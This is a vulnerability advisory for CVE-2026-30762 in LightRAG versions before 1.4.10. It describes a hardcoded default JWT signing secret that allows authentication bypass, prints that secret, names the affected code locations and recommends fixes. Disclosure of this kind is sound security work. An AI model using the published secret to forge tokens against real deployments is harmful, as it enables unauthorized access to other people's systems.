CVE-2026-30762

Name of the Vulnerable Software and Affected Versions LightRAG versions prior to 1.4.10

Description A hardcoded JWT signing secret in LightRAG allows authentication bypass, potentially leading to unauthorized access. The default JWT secret 'lightrag-jwt-default-secret' is used if the TOKEN SECRET environment variable is not set. An attacker can forge valid JWT tokens using this known secret and access protected endpoints. The vulnerable code is located in lightrag/api/config.py (line 397) and lightrag/api/auth.py (lines 24-25).

Recommendations Require the TOKEN SECRET environment variable to be explicitly set when authentication is configured. Refuse to start the API server if authentication is enabled but no custom secret is provided.